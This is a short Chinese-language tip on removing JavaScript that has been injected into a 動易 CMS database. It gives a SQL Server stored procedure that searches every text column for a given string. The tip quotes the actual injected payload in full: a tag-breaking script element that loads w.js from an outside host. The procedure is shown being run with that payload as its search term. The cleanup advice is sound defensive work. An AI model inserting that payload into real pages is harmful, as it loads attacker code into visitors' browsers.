問題:動易數據庫連續幾天被注入JS代碼,那么可不可以直接從數據庫著手進行清除木馬代碼操作呢?
數據庫被注入的代碼是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--
解決:發現在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一個一個去查,是比較費時費力的,那么我們可以通過一個全庫搜索的方法,建立一個存儲過程
create proc p_search
@str Nvarchar(1000) --要搜索的字符串
as
if @str='' return
declare @s Nvarchar(4000)
create table #t(表名 sysname,字段名 sysname)
declare tb cursor local for
select s='if exists(select 1 from ['+replace(b.name,']',']]')+'] where ['+a.name+'] like N''%'+@str+'%'')
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xtype in(175,239,99,35,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
GO
執行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
找到被注入的表及字段,執行恢復操作,下面是一個例子
新聞熱點
疑難解答
